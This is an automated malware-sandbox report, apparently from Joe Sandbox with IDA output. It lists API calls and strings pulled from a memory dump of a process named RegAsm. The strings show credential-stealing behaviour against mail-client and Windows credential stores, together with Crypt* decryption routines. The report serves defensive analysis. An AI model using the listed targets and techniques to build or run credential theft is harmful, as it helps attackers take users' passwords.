                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                APIs
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                APIs
                                                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                • String ID: Creds$ps:password
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                APIs
                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                Strings
                                                                                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                • String ID: 0wE$d
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                  • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                  • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2432066023-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
